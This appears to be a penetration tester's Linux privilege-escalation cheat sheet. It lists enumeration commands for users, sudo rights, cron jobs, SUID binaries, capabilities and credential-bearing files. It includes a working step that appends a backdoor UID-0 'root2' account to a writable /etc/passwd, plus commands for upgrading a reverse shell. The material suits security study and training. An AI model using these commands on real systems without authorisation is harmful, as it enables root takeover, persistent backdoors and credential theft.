Untitled

## TOP PRIORITY CHECKS
Checks current user and privileges:
```bash title:"Current User"
whoami
```
```bash title:"User Privileges"
id
```
Check environment variables and PATH:
```bash
echo $PATH
env
```
Sudo Privileges:
```bash
sudo -l
```
Check Existing Users With Shell Available:
```bash
cat /etc/passwd | grep -vE '(nologin|false)'
```
> [!info]- Passwd File Description
> `joe:x:1000:1000:joe,,,:/home/joe:/bin/bash`
> - **Login Name**: "joe" - Indicates the username used for login.
>- **Encrypted Password**: "x" - This field typically contains the hashed version of the user's password. In this case, the value _x_ means that the entire password hash is contained in the **/etc/shadow** file (more on that shortly).
>- **UID**: "1000" - Aside from the root user that has always a UID of _0_, Linux starts counting regular user IDs from 1000. This value is also called _real user ID_.
>- **GID**: "1000" - Represents the user's specific Group ID.
>- **Comment**: "joe,,," - This field generally contains a description about the user, often simply repeating username information.
>- **Home Folder**: "/home/joe" - Describes the user's home directory prompted upon login.
>- **Login Shell**: "/bin/bash" - Indicates the default interactive shell, if one exists.

Try the ways for the `root`:
```bash
sudo -i
sudo su
su - root
```

Check Scheduled Tasks:
```bash title:"Check All Tasks"
ls -lah /etc/cron*
```
```bash title:"User Scheduled Jobs"
crontab -l
```
```bash title:"Root Scheduled Tasks"
sudo crontab -l 
```

Check directories with WRITE privileges:
```bash
find / -writable -type d 2>/dev/null
```

Search for SUID-marked binaries:
```bash
find / -perm -u=s -type f 2>/dev/null
```
Search for SGID-marked binaries:
```bash
find / -perm -g=s -type f 2>/dev/null
```

Enumeration of SETUID capabilities:
```bash
/usr/sbin/getcap -r / 2>/dev/null
```
```bash
getcap -r / 2>/dev/null
```
## Network Related Checks
Network Hostname
```bash
hostname
```

Check network settings:
```bash title:"IP Config"
ip a
```
```bash title:"Network Routes Check"
routel
```
```bash title:"Current Open Connections"
ss -anp
```
```bash title:"iptables Rules"
cat /etc/iptables/rules.v4
```
## System Checks
Check current OS and Kernel versions:
```bash
cat /etc/issue
```
```bash
cat /etc/os-release
```
```bash
uname -a
```
Running processes:
```bash
ps aux
```
Installed packages etc.:
```bash title:"Installed Debian Packages"
dpkg -l
```
Check mounted systems and disks:
``` bash
cat /etc/fstab
mount
lsblk
```
Check loaded Kernel modules:
```
lsmod
```
```bash title:"Check Info About Particular Kernel Mod"
/sbin/modinfo [MODULE_NAME]
```
```bash title:"Check Running Processes"
watch -n 1 "ps -aux | grep pass"
```

## Interesting Files Quick Search
```bash title:"Find All Accessible History Files"
find / -type f \( -name *_hist -o -name *_history \) -exec ls -l {} \; 2>/dev/null
```
```bash title:"Find world-writeable directories"
find / -path /proc -prune -o -type d -perm -o+w 2>/dev/null
```
```bash title:"Find all hidden directories"
find / -type d -name ".*" -ls 2>/dev/null
```
```bash title:"Find all hidden files"
find / -type f -name ".*" -exec ls -l {} \; 2>/dev/null
```
```bash title:"Find world-writeable files"
find / -path /proc -prune -o -type f -perm -o+w 2>/dev/null
```
```bash title:"Enumerate binary files capabilities"
find /usr/bin /usr/sbin /usr/local/bin /usr/local/sbin -type f -exec getcap {} \;
```
```bash title:"Search config files"
find / ! -path "*/proc/*" -iname "*config*" -type f 2>/dev/null
```
```bash title:"Search config files"
find / -type f \( -name *.conf -o -name *.config \) -exec ls -l {} \; 2>/dev/null
```
```bash title:"Find .sh scripts"
find / -type f -name "*.sh" 2>/dev/null \| grep -v "src\|snap\|share"
```
```bash title:"Resursively inspect file contents to find instances of "word":"
grep -r "word" /var
```
```bash title:"Find temporary files and opt folders"
ls -l /tmp /var/tmp /dev/shm /opt /var/opt
```

## Writable `passwd` file
Use `ls -la /etc/passwd`
Supposing you have write permissions, you can ***generate a password hash*** and use it to log as `root` as follows:

1. Generate the password hash: 
```bash
openssl passwd w00t
```
3. Append the password hash inside the passwd file:
```bash
echo "root2:Fdzt.eqJQ4s0g:0:0:root:/root:/bin/bash" >> /etc/passwd
```
4. Now you can login as root using `su root2` and inserting `w00t` as the user's password
## Shell Upgrade
Upgrade the shell via Python call (depends on the Python binary):
```bash
python3 -c 'import pty; pty.spawn("/bin/bash")'
```
Upgrade shell via TTY:
```bash title:"In Kali"
stty raw -echo
fg
```
```bash title:"In Reverse Shell"
reset
export SHELL=bash
export TERM=xterm-256color
stty rows <num> columns <cols>
```